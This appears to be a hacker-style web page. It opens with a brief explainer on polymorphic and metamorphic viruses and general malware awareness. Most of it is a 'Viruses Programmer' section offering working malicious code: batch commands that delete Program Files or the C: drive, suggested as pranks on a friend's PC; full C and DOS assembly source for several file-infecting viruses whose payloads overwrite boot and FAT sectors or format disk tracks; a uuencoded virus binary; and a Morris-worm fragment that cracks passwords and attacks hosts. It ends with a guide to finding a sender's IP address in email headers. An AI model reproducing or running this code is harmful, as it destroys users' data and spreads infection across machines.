Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses, however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts that stay the same on each infection, making it impossible to detect directly using signatures. Anti-virus software can detect it by decrypting the virus using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body. See Polymorphic code for technical detail on how such engines operate.

Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for anti-virus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This makes it more likely that detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.

Metamorphic code

To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of assembly language code, 90% of it part of the metamorphic engine.

Conclusions

There are lots of viruses in the world and new viruses are coming up every day. New anti-virus programs and techniques are being developed too. It is good to be aware of viruses and other malware, and it is cheaper to protect your environment from them than to be sorry.

There might be a virus in your computer if it starts acting differently. There is no reason to panic if a computer virus is found.

It is good to be a little suspicious of malware when you surf the Internet and download files. Some files that look interesting might hide malware.

A computer virus is a program that reproduces itself, and its mission is to spread. Most viruses are harmless, and some viruses might cause random damage to data files.

A trojan horse is not a virus because it doesn't reproduce. Trojan horses are usually masked so that they look interesting. There are trojan horses that steal passwords and format hard disks.

Macro viruses spread from applications which use macros. Macro viruses spread fast because people share so much data, email documents and use the Internet to get documents. Macros are also very easy to write.

Some people want to experiment with how to write viruses and test their programming talent. At the same time they do not understand the consequences for other people, or they simply do not care.

A virus's mission is to hop from one program to another, and this can happen via floppy disks, Internet FTP sites, newsgroups and email attachments. Viruses are mostly written for PC computers and DOS environments.

Viruses are no longer something that only programmers and computer specialists have to deal with. Today everyday users have to deal with viruses.


Viruses Programmer

1) A simple virus

A simple virus, just one line, just for fun.

=================cut below=============

@ECHO OFF

IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.*

===================end==================

Paste it into Notepad and give it whatever name you want, e.g. <fun.bat>. You have to give it the .bat extension, otherwise it won't work.

2) Format your friend's PC

=================cut below=============

@ ECHO OFF

DEL C:\ *.*/Y.

3) R-virus

#include

#include

#include

#include

#include

/* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM

file which CVIRUS can infect without increasing the size of the


file. (Since this would tip off the victim to CVIRUS's presence, no

file under this size will be infected.) It should be set to the

approximate size of the LZEXEd .EXE file produced from this code, but

always a few bytes larger. Why? Because this way CVIRUS doesn't need

to check itself for previous infection, saving time.

SIGNATURE is the four-byte signature that CVIRUS checks for to prevent

re-infection of itself.

*/

#ifdef DEBUG

#define TOO_SMALL 6000

#else

#define TOO_SMALL 4735

#endif

#define SIGNATURE "NMAN"

/* The following is a table of random byte values. Be sure to constantly

change this to prevent detection by virus scanners, but keep it short

(or non-existent) to keep the code size down.

*/

char screw_virex[] = "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04";

void hostile_activity(void)

{

/* Put whatever you feel like doing here...

I chose to make this routine trash the victim's boot, FAT,

and directory sectors, but you can alter this code however you want,

and are encouraged to do so.

*/


#ifdef DEBUG

puts("\aAll files infected!");

exit(1);

#else

/* Overwrite five sectors, starting with sector 0, on C:, with the

memory at location DS:0000 (random garbage).

*/

abswrite(2,5,0,(void *) 0);

__emit__(0xCD, 0x19); // Reboot computer

#endif

}

int infected(char *fname)

{

/* This function determines if fname is infected. It reads four

bytes 28 bytes in from the start and checks them against

the current header. 1 is returned if the file is already infected,

0 if it isn't.

*/

register int handle;

char virus_signature[35];

static char check[] = SIGNATURE;

handle = _open(fname, O_RDONLY);

_read(handle, virus_signature,

sizeof(virus_signature));

close(handle);

#ifdef DEBUG


printf("Signature for %s: %.4s\n", fname, &virus_signature[28]);

#endif

/* This next bit may look really stupid, but it actually saves about

100 bytes.

*/

return((virus_signature[30] == check[2]) && (virus_signature[31] == check[3]));

}

void spread(char *virus, struct ffblk *victim)

{

/* This function infects victim with virus. First, the victim's

attributes are set to 0. Then the virus is copied into the victim's

file name. Its attributes, file date/time, and size are set to that

of the victim's, preventing detection, and the files are closed.

*/

register int virus_handle, victim_handle;

unsigned virus_size;

char virus_code[TOO_SMALL + 1], *victim_name;

/* This is used enough to warrant saving it in a separate variable */

victim_name = victim->ff_name;

#ifdef DEBUG

printf("Infecting %s with %s...\n", victim_name, virus);

#endif

/* Turn off all of the victim's attributes so it can be replaced */

_chmod(victim_name, 1, 0);


#ifdef DEBUG

puts("Ok so far...");

#endif

/* Recreate the victim */

virus_handle = _open(virus, O_RDONLY);

victim_handle = _creat(victim_name, victim->ff_attrib);

/* Copy virus */

virus_size = _read(virus_handle, virus_code, sizeof(virus_code));

_write(victim_handle, virus_code, virus_size);

#ifdef DEBUG

puts("Almost done...");

#endif

/* Reset victim's file date, time, and size */

chsize(victim_handle, victim->ff_fsize);

setftime(victim_handle, (struct ftime *) &victim->ff_ftime);

/* Close files */

close(virus_handle);

close(victim_handle);

#ifdef DEBUG


puts("Infection complete!");

#endif

}

struct ffblk *victim(void)

{

/* This function returns a pointer to the name of the virus's next

victim. This routine is set up to try to infect .EXE and .COM

files. If there is a command line argument, it will try to

infect that file instead. If all files are infected, hostile

activity is initiated...

*/

register char **ext;

static char *types[] = {"*.EXE", "*.COM", NULL};

static struct ffblk ffblk;

int done;

for (ext = (*++_argv) ? _argv : types; *ext; ext++)

{

for (ext = (*++_argv) ? _argv : types; *ext; ext++)

{

done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM |

FA_ARCH);

while (!done) {

#ifdef DEBUG

printf("Scanning %s...\n", ffblk.ff_name);

#endif

/* If you want to check for specific days of the week, months,

etc.... here is the place to insert the code (don't forget to

"#include ").

*/


if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name)))

return(&ffblk);

done = findnext(&ffblk);

}

}

}

/* If there are no files left to infect, have a little fun */

hostile_activity();

return(0);

}

int main(int argc, char *argv[])

{

/* In the main program, a victim is found and infected. If all files

are infected, a malicious action is performed. Otherwise, a bogus

error message is displayed, and the virus terminates with code

1, simulating an error.

*/

char *err_msg[] = { "Out of memory",

"Bad EXE format",

"Invalid DOS version",

"Bad memory block",

"FCB creation error",

"Sharing violation",

"Abnormal program termination",

"Divide error",

};

char *virus_name;

spread(argv[0], victim());

puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]);


return(1);

}

4) R-300 virus

;

; R-1000 Virus

;

; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Infector.

; When an infected program is started, the virus will infect all files in the

; current directory and use the time counter for its encryption. It displays

; the text "T-1000" when it is ready infecting.

Code Segment para 'code'

Assume Cs:Code,Ds:Code

Length Equ Offset EndByte-Offset Main

Org 100h

Main: Mov Si,Offset Decrypt

Mov Di,Si

Mov Cl,Offset EndByte-Offset Decrypt

On2: Lodsb

Db 34h

Crypt Db 0

Stosb

Dec Cl

Cmp Cl,0ffh

Jne On2

Decrypt:


Mov Ah,4eh

Push Ax

Encr:

Mov Ah,2ch

Int 21h

Mov Crypt,Dl

Mov Si,Offset Decrypt

Mov Di,Offset EndByte+10

Mov Cx,Offset EndByte-Offset Decrypt

On3: Lodsb

Xor Al,Crypt

Stosb

Dec Cx

Cmp Cx,0ffffh

Jne On3

Pop Ax

On1: Xor Cx,Cx

Mov Dx,Offset Nam

Int 21h

Jc Einde

Mov Ax,3d01h

Mov Dx,9eh

Int 21h

Mov Bx,Ax

Mov Ah,40h

Push Ax

Mov Cx,Offset Decrypt-Offset Main

Mov Dx,Offset Main

Int 21h


Pop Ax

Mov Cx,Offset EndByte-Offset Decrypt

Mov Dx,Offset EndByte+10

Int 21h

Mov Ah,3eh

Int 21h

Mov Ah,4fh

Push Ax

Jmp Short Encr

Einde:

Mov Ah,9

Mov Dx,Offset Msg

Push Cs

Pop Ds

Int 21h

Int 20h

Msg Db 'T-1000$'

Nam Db '*.Com',0

EndByte Db 0

Code Ends

End Main

; ────────────────────────────────────┐

; ──────────> and Remember Don't Forget to Call <────────

; ──────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <─────

; ────────────────────────────────────┐


5) leprosy.c virus

#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */

#define NO_MATCH 0x12 /* No match in wildcard search. */

/* The following strings are not garbled; they are all encrypted */

/* using the simple technique of adding the integer value 10 to */

/* each character. They are automatically decrypted by */

/* 'print_s()', the function which sends the strings to 'stdout' */

/* using DOS service 09H. All are terminated with a dollar-sign */

/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";

char *virus_msg[3] =

{

CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",

CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|

\x7f}*sx\x80ox~on*l\x83.",

CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."

};


struct _dta /* Disk Transfer Area format for find. */

{

char findnext[21];

char attribute;

int timestamp;

int datestamp;

long filesize;

char filename[13];

} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */

const char filler[] = "XX"; /* Pad file length to 666 bytes. */

const char *codestart = (char *) 0x100; /* Memory where virus code begins. */

const int virus_size = 666; /* The size in bytes of the virus code. */

const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */

int handle; /* The current file handle being used. */

int datestamp, timestamp; /* Store original date and time here. */

char diseased_count = 0; /* How many infected files found so far. */

char success = 0; /* How many infected this run. */

/* The following are function prototypes, in keeping with ANSI */

/* Standard C, for the support functions of this program. */

int find_first( char *fn );

int find_healthy( void );

int find_next( void );

int healthy( void );

void infect( void );

void close_handle( void );


void open_handle( char *fn );

void print_s( char *s );

void restore_timestamp( void );

/*----------------------------------*/

/* M A I N P R O G R A M */

/*----------------------------------*/

int main( void ) {

int x = 0;

do {

if ( find_healthy() ) { /* Is there an un-infected file? */

infect(); /* Well, then infect it! */

x++; /* Add one to the counter. */

success++; /* Carve a notch in our belt. */

}

else { /* If there ain't a file here... */

_DX = (int) ".."; /* See if we can step back to */

_AH = 0x3b; /* the parent directory, and try */

asm int 21H; /* there. */

x++; /* Increment the counter anyway, to */

} /* avoid infinite loops. */

} while( x < infection_rate ); /* Do this until we've had enough. */

if ( success ) /* If we got something this time, */

print_s( fake_msg ); /* feed 'em the phony error line. */

else

if ( diseased_count > 6 ) /* If we found 6+ infected files */

for( x = 0; x < 3; x++ ) /* along the way, laugh!! */

print_s( virus_msg[x] );

else

print_s( fake_msg ); /* Otherwise, keep a low profile. */

return;


}

void infect( void ) {

_DX = (int) dta->filename; /* DX register points to filename. */

_CX = 0x00; /* No attribute flags are set. */

_AL = 0x01; /* Use Set Attribute sub-function. */

_AH = 0x43; /* Assure access to write file. */

asm int 21H; /* Call DOS interrupt. */

open_handle( dta->filename ); /* Re-open the healthy file. */

_BX = handle; /* BX register holds handle. */

_CX = virus_size; /* Number of bytes to write. */

_DX = (int) codestart; /* Write program code. */

_AH = 0x40; /* Set up and call DOS. */

asm int 21H;

restore_timestamp(); /* Keep original date & time. */

close_handle(); /* Close file. */

return;

}

int find_healthy( void ) {

if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */

if ( healthy() ) /* If it's healthy, OK! */

return 1;

else

while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */

if ( healthy() )

return 1; /* If you find one, great! */

if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */

if ( healthy() ) /* If it's healthy, OK! */

return 1;

else

while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */


if ( healthy() )

return 1; /* If you find one, great! */

return 0; /* Otherwise, say so. */

}

int healthy( void ) {

int i;

datestamp = dta->datestamp; /* Save time & date for later. */

timestamp = dta->timestamp;

open_handle( dta->filename ); /* Open last file located. */

_BX = handle; /* BX holds current file handle. */

_CX = 20; /* We only want a few bytes. */

_DX = (int) compare_buf; /* DX points to the scratch buffer. */

_AH = 0x3f; /* Read in file for comparison. */

asm int 21H;

restore_timestamp(); /* Keep original date & time. */

close_handle(); /* Close the file. */

for ( i = 0; i < 20; i++ ) /* Compare to virus code. */

if ( compare_buf[i] != *(codestart+i) )

return 1; /* If no match, return healthy. */

diseased_count++; /* Chalk up one more fucked file. */

return 0; /* Otherwise, return infected. */

}

void restore_timestamp( void ) {

_AL = 0x01; /* Keep original date & time. */

_BX = handle; /* Same file handle. */

_CX = timestamp; /* Get time & date from DTA. */

_DX = datestamp;

_AH = 0x57; /* Do DOS service. */

asm int 21H;


return;

}

void print_s( char *s ) {

char *p = s;

while ( *p ) { /* Subtract 10 from every character. */

*p -= 10;

p++;

}

_DX = (int) s; /* Set DX to point to adjusted string. */

_AH = 0x09; /* Set DOS function number. */

asm int 21H; /* Call DOS interrupt. */

return;

}

int find_first( char *fn ) {

_DX = (int) fn; /* Point DX to the file name. */

_CX = 0xff; /* Search for all attributes. */

_AH = 0x4e; /* 'Find first' DOS service. */

asm int 21H; /* Go, DOS, go. */

return _AX; /* Return possible error code. */

}

int find_next( void ) {

_AH = 0x4f; /* 'Find next' function. */

asm int 21H; /* Call DOS. */

return _AX; /* Return any error code. */

}

void open_handle( char *fn ) {


_DX = (int) fn; /* Point DX to the filename. */

_AL = 0x02; /* Always open for both read & write. */

_AH = 0x3d; /* "Open handle" service. */

asm int 21H; /* Call DOS. */

handle = _AX; /* Assume handle returned OK. */

return;

}

void close_handle( void ) {

_BX = handle; /* Load BX register w/current file handle. */

_AH = 0x3e; /* Set up and call DOS service. */

asm int 21H;

return;

}

6) virus200063

model tiny ; x*x*x*x*x*x*x

.code ; Virus code segment

org 100h ; COM file starting IP

entry_point: db 0e9h,0,0 ; jmp decrypt

decrypt: ; handles encryption and decryption

mov cx,(offset heap - offset startencrypt)/2 ; iterations

patch_startencrypt:

mov di,offset startencrypt ; start of decryption

decrypt_loop:

db 81h,35h ; xor word ptr [di], xxxx

decrypt_value dw 0 ; initialised at zero for null effect

inc di ; calculate new decryption location

inc di

loop decrypt_loop ; decrypt mo'

startencrypt:


call next ; calculate delta offset

next: pop bp ; bp = IP next

sub bp,offset next ; bp = delta offset

lea si,[bp+save3]

mov di,100h

push di ; For later return

movsw

movsb

mov byte ptr [bp+numinfec],1 ; reset infection counter

mov ah,1Ah ; Set new DTA

lea dx,[bp+newDTA] ; new DTA @ DS:DX

int 21h

mov ah,47h ; Get current directory

mov dl,0 ; Current drive

lea si,[bp+origdir] ; DS:SI->buffer

int 21h

mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR

mov ax,3524h ; Get int 24 handler

int 21h ; to ES:BX

mov word ptr [bp+oldint24],bx; Save it

mov word ptr [bp+oldint24+2],es

mov ah,25h ; Set new int 24 handler

lea dx,[bp+offset int24] ; DS:DX->new handler

int 21h

push cs ; Restore ES

pop es ; 'cuz it was changed

dir_scan: ; "dot dot" traversal

lea dx,[bp+com_mask]


mov ah,4eh ; find first file

mov cx,7 ; any attribute

findfirstnext:

int 21h ; DS:DX points to mask

jc done_infections ; No mo files found

mov al,0h ; Open read only

call open

mov ah,3fh ; Read file to buffer

lea dx,[bp+buffer] ; @ DS:DX

mov cx,1Ah ; 1Ah bytes

int 21h

mov ah,3eh ; Close file

int 21h

checkCOM:

mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA

cmp ax,2000 ; Is it too small?

jb find_next

cmp ax,65535-(endheap-decrypt) ; Is it too large?

ja find_next

mov bx,word ptr [bp+buffer+1]; get jmp location

add bx,heap-decrypt+3 ; Adjust for virus size

cmp ax,bx

je find_next ; already infected

jmp infect_com

find_next:

mov ah,4fh ; find next file

jmp short findfirstnext

mov ah,3bh ; change directory


lea dx,[bp+dot_dot] ; "cd .."

int 21h

jnc dir_scan ; go back for mo!

done_infections:

jmp activate ; Always activate

exit_virus:

mov ax,2524h ; Restore int 24 handler

lds dx,[bp+offset oldint24] ; to original

int 21h

push cs

pop ds

mov ah,3bh ; change directory

lea dx,[bp+origdir-1] ; original directory

int 21h

mov ah,1ah ; restore DTA to default

mov dx,80h ; DTA in PSP

int 21h

retn ; 100h is on stack

save3 db 0cdh,20h,0 ; First 3 bytes of COM file

activate: ; ******************************

mov ax,04301h ; DOS set file attributes function

xor cx,cx ; File will have no attributes

lea dx,[di + 01Eh] ; DX points to file name

int 021h

mov ax,03D02h ; DOS open file function, r/w

lea dx,[di + 01Eh] ; DX points to file name

int 021h

xchg bx,ax ; Transfer file handle to AX

jmp exit_virus


creator db '[ZEB(C)1992]',0 ; Mass Produced Code Generator

virusname db '[ranger]',0

infect_com: ; ax = filesize

mov cx,3

sub ax,cx

lea si,[bp+offset buffer]

lea di,[bp+offset save3]

movsw

movsb

mov byte ptr [si-3],0e9h

mov word ptr [si-2],ax

add ax,103h

push ax ; needed later

finishinfection:

push cx ; Save # bytes to write

xor cx,cx ; Clear attributes

call attributes ; Set file attributes

mov al,2

call open

mov ah,40h ; Write to file

lea dx,[bp+buffer] ; Write from buffer

pop cx ; cx bytes

int 21h

mov ax,4202h ; Move file pointer

xor cx,cx ; to end of file

cwd ; xor dx,dx

int 21h

get_encrypt_value:

mov ah,2ch ; Get current time


int 21h ; dh=sec,dl=1/100 sec

or dx,dx ; Check if encryption value = 0

jz get_encrypt_value ; Get another if it is

mov [bp+decrypt_value],dx ; Set new encryption value

lea di,[bp+code_store]

mov ax,5355h ; push bp,push bx

stosw

lea si,[bp+decrypt] ; Copy encryption function

mov cx,startencrypt-decrypt ; Bytes to move

push si ; Save for later use

push cx

rep movsb

lea si,[bp+write] ; Copy writing function

mov cx,endwrite-write ; Bytes to move

rep movsb

pop cx

pop si

pop dx ; Entry point of virus

push di

push si

push cx

rep movsb ; Copy decryption function

mov ax,5b5dh ; pop bx,pop bp

stosw

mov al,0c3h ; retn

stosb

add dx,offset startencrypt - offset decrypt ; Calculate new

mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of

call code_store ; decryption

pop cx

pop di

pop si


rep movsb ; Restore decryption function

mov ax,5701h ; Restore creation date/time

mov cx,word ptr [bp+newDTA+16h] ; time

mov dx,word ptr [bp+newDTA+18h] ; date

int 21h

mov ah,3eh ; Close file

int 21h

mov ch,0

mov cl,byte ptr [bp+newDTA+15h] ; Restore original

call attributes ; attributes

dec byte ptr [bp+numinfec] ; One mo infection

jnz mo_infections ; Not enough

jmp done_infections

mo_infections: jmp find_next

open:

mov ah,3dh

lea dx,[bp+newDTA+30] ; filename in DTA

int 21h

xchg ax,bx

ret

attributes:

mov ax,4301h ; Set attributes to cx

lea dx,[bp+newDTA+30] ; filename in DTA

int 21h

ret

write:

pop bx ; Restore file handle


pop bp ; Restore relativeness

mov ah,40h ; Write to file

lea dx,[bp+decrypt] ; Concatenate virus

mov cx,heap-decrypt ; # bytes to write

int 21h

push bx

push bp

endwrite:

int24: ; New int 24h (error) handler

mov al,3 ; Fail call

iret ; Return control

com_mask db '*.com',0

dot_dot db '..',0

heap: ; Variables not in code

; The following code is the buffer for the write function

code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)

oldint24 dd ? ; Storage for old int 24h handler

backslash db ?

origdir db 64 dup (?) ; Current directory buffer

newDTA db 43 dup (?) ; Temporary DTA

numinfec db ? ; Infections this run

buffer db 1ah dup (?) ; read buffer

endheap: ; End of virus

end entry_point


8) Virus: Don't be sad

;

; ---- Data Segment Values ----

; ds:[0f6h] = read buffer location

; ds:[0f8h] = write buffer location

; ds:[0fah] = store length of virus at this location

; ds:[0fch] = store length of file to be infected at this location

; ds:[0feh] = filename of file to infect

;

.model tiny

.code

org 100h ; origin for .com files

start:

nop ; these two nop instructs will be used by 'Nasty'

nop ; to determine if a file is already infected

;******

;get date

;******

mov ah,2ah ; get the date

int 21h ; do it

cmp dh,09h ; is it September?

jnz do_not_activate ; if NO jmp do_not_activate

;****

;the nasty bit

;****


;*

;* 1. Print message

;*

lea dx,mess ; print message

mov ah,09 ; 'Nasty in September'

int 21h ; do it

;****

;* 2. Destroy disk

;****

mov ah,19h ; get current drive (returned in al)

int 21h ; do it

mov dl,al ; dl = drive # to be formatted

mov ah,05 ; disk format function

mov cl,01 ; first sector

mov ch,00 ; first track

mov dh,00 ; head zero

mov al,10h ; 10h (16) sectors - 2 tracks

int 13h ; do it (overwrite first 16 tracks on currently

; selected disc)

do_not_activate:

mov cx,80h ; save parameters; set counter to 80h bytes

mov si,0080h ; offset in the current data segment of the byte

; to be copied

mov di,0ff7fh ; offset to which byte is to be moved

rep movsb ; move bytes until cx=0 (decrement cx by 1 each time

; loop is performed is done automatically)

; (increment by 1 of si & di is done automatically)

lea ax,begp ; load exit from program offset address into ax

mov cx,ax ; " " " " " " " cx

sub ax,100h ; subtract start of .com file address (100h) from ax

; ax now contains the length of the virus


mov ds:[0fah],ax ; put length of the virus into the data segment at

; offset 0fah

add cx,fso ; add fso (5h) to cx (offset address of exit)

; so, cx=cx+5

mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at

; offset 0f8h. ** Start of the write buffer.

ADD CX,AX ; add virus length (ax) to cx ?????

mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.

; ** Start of the read buffer

mov cx,ax ; mov length of virus into cx

lea si,start ; load address of 'start' (start of virus) into

; source index

mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into

; destination index

rb: ; cx = counter (length of virus)

; si = offset of byte to be read

; di = offset of where to write byte to

; (auto decrement of cx & increment of si & di)

rep movsb ; copy the virus into memory

stc ; set the carry flag

lea dx,file_type_to_infect ; set infector for .com files only

mov ah,4eh ; find first file with specified params

mov cx,20h ; files with archive bit set

int 21h ; do it

; if file found, CF is cleared, else

; CF is set

or ax,ax ; works the below instructions (jz & jmp)

jz file_found ; if file found jmp file_found


jmp done ; if no file found, jmp done (exit virus)

file_found:

mov ah,2fh ; get dta (returned in es:bx)

int 21h ; do it

mov ax,es:[bx+1ah] ; mov size of file to be infected into ax

mov ds:[0fch],ax ; mov filesize into ds:[0fch]

add bx,1eh ; bx now points to asciz filename

mov ds:[0feh],bx ; mov filename into ds:[0feh]

clc ; clear carry flag

mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)

mov dx,bx ; mov filename into dx

int 21h ; do it (ax contains file handle)

mov bx,ax ; mov file handle into bx

mov ax,5700h ; get time & date attribs from file to infect

int 21h ; do it (file handle in bx)

push cx ; save time to the stack

push dx ; save date to the stack

mov ah,3fh ; read from file to be infected

mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to

; be infected

mov dx,ds:[0f6h] ; buffer (where to read bytes to)

int 21h ; do it

mov bx,dx ; mov buffer location to bx

mov ax,[bx] ; mov contents of bx (first two bytes - as bx is

; 16-bits) into ax.

; Now check to see if file is infected... if the


; file is infected, it's first two bytes will be

; 9090h (nop nop)

sub ax,9090h ; If file is already infected, zero flag will be set

; thus jump to fin(ish)

jz fin

mov ax,ds:[0fch] ; mov filesize of file to be infected into ax

mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx

mov [bx-2],ax ; correct old len

mov ah,3ch ; Create file with handle

mov cx,00h ; cx=attribs -- set no attributes

mov dx,ds:[0feh] ; point to name

clc ; clear carry flag

int 21h ; create file

; Note: If filename already exists, (which it does)

; truncate the filelength to zero - this is ok as

; we have already copied the file to be infected

; into memory.

mov bx,ax ; mov file handle into bx

mov ah,40h ; write file with handle (write to the file to be

; infected) - length currently zero

; cx=number of bytes to write

mov cx,ds:[0fch] ; length of file to be infected

add cx,ds:[0fah] ; length of virus

mov DX,ds:[0f8h] ; location of write buffer (this contains the virus

; + the file to be infected)

int 21h ; write file

; new file = virus + file to be infected


mov ax,5701h ; restore original time & date values

pop dx ; get old date from the stack

pop cx ; get old time from the stack

int 21h ; do it

; Note: Infected file will now carry the time & date

; it had before the infection.

mov ah,3eh ; close file (bx=file handle)

int 21h ; do it

; Note: date & time stamps automatically updated if

; file written to.

fin:

stc ; set carry flag

mov ah,4fh ; find next file (.com)

int 21h ; do it

or ax,ax ; decides zero flag outcome

jnz done ; if no more .com files, jmp done

JMP file_found ; else begin re-infection process for new file.

done:

mov cx,80h ; set counter (cx) = 80h

mov si,0ff7fh ; source offset address (copy from here)

mov di,0080h ; destination offset address (copy to here)

rep movsb ; copy bytes! (cx is auto decremented by 1

; si & di are auto incremented by 1)

; Note: this is a 'restore parameters' feature

; this does the reverse of what was done earlier

; in the program (do_not_activate:)

mov ax,0a4f3h ;

mov ds:[0fff9h],ax ;

mov al,0eah ;

mov ds:[0fffbh],al ; reset data segment locations ??? (to previous


mov ax,100h ; values before virus infection)

mov ds:[0fffch],ax ;

lea si,begp ; load exit from program offset address into si

lea di,start ; load offset address of start of virus into di

mov ax,cs

mov ds:[0fffeh],ax ; re-align cs = ds ???

mov kk,ax

mov cx,fso

db 0eah ; define byte

dw 0fff9h ; define word

kk dw 0000h ; define kk = word

mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display

file_type_to_infect db '*?.com',0 ; infect only .com files.

fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes

; in size (a word)

; ----- alma mater

begp:

mov ax,4c00h ; normal dos termination (set al to 00)

int 21h ; do it

end start

begin 775 sad.com

MD)"T*LTA@/X)=1FZ#@*T"_@#XN`(]B]/-(8O8N`!7S2%1

M4K0_BP[\`(L6]@#-(8O:BP]@")1_ZT/+D``(L6_@#XS2&+

MV+1`BP[\``,.^@"+%O@`S2&X`5=:6<TAM#[-(?FT3\TA"\!U`NN*N8``OG__

MOX``\Z2X\Z2C^?^PZJ+[_[@``:/\_[XM`K\``8S(H_[_HPP"BPXK`NKY_P``

D4V%D('9I<G5S("T@,C0O."\Y,0T*)"H_+F-O;0`%`+@`3,TA

`


end

9) Worm viruses


#include

#include

#include

#include

long current_time;

struct rlimit no_core = {0,0};

int

main (argc, argv)

int argc;

char *argv[];

{


int n;

int parent = 0;

int okay = 0;

/* change calling name to "sh" */

strcpy(argv[0], "sh");

/* prevent core files by setting limit to 0 */

setrlimit(RLIMIT_CORE, no_core);

current_time = time(0);

/* seed random number generator with time */

srand48(current_time);

n = 1;

while (argv[n]) {

/* save process id of parent */

if (!strncmp(argv[n], "-p", 2)) {

parent = atoi (argv[++n]);

n++;

}


else {

/* check for 1l.c in argument list */

if (!strncmp(argv[n], "1l.c", 4))

okay = 1;

/* load an object file into memory */

load_object (argv[n]);

/* clean up by unlinking file */

if (parent)

unlink (argv[n]);

/* and removing object file name */

strcpy (argv[n++], "");

}

}

/* if 1l.c was not in argument list, quit */

if (!okay)

exit (0);


/* reset process group */

setpgrp (getpid());

/* kill parent shell if parent is set */

if (parent)

kill(parent, SIGHUP);

/* scan for network interfaces */

if_init();

/* collect list of gateways from netstat */

rt_init();

/* start main loop */

doit();

}

int

doit()

{

current_time = time (0);


/* seed random number generator (again) */

srand48(current_time);

/* attack gateways, local nets, remote nets */

attack_hosts();

/* check for a "listening" worm */

check_other ();

/* attempt to send byte to "ernie" */

send_message ();

for (;;) {

/* crack some passwords */

crack_some ();

/* sleep or listen for other worms */

other_sleep (30);

crack_some ();

/* switch process id's */

if (fork())

/* parent exits, new worm continues */


exit (0);

/* attack gateways, known hosts */

attack_hosts();

other_sleep(120);

/* if 12 hours have passed, reset hosts */

if(time (0) == current_time + (3600*12)) {

reset_hosts();

current_time = time(0); }

/* quit if pleasequit is set, and nextw>10 */

if (pleasequit && nextw > 10)

exit (0);

}

}


HOW TO TRACK IP ADDRESSES

How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Gmail

1. Log into your Gmail account with your username and password.

2. Open the mail.

3. To display the headers,

* Click on More options corresponding to that thread. You should get a bunch of links.

* Click on Show original

4. You should get headers like this:

Gmail headers: [screenshot not reproduced]

Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245. That is the IP address of the sender!

5. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.

2. Click on Inbox or whichever folder you have stored your mail.

3. Open the mail.


4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

* Click on Options on the top-right corner

* In the Mail Options page, click on General Preferences

* Scroll down to Messages where you have the Headers option

* Make sure that Show all headers on incoming messages is selected

* Click on the Save button

* Go back to the mails and open that mail

5. You should see headers similar to this:

Yahoo! headers: [screenshot not reproduced]

Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109. That is the IP address of the sender!

6. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.

2. Click on the Mail tab on the top.

3. Open the mail.

4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

* Click on Options on the top-right corner

* In the Mail Options page, click on Mail Display Settings

* In Message Headers, make sure Advanced option is checked

* Click on Ok button

* Go back to the mails and open that mail

5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address.

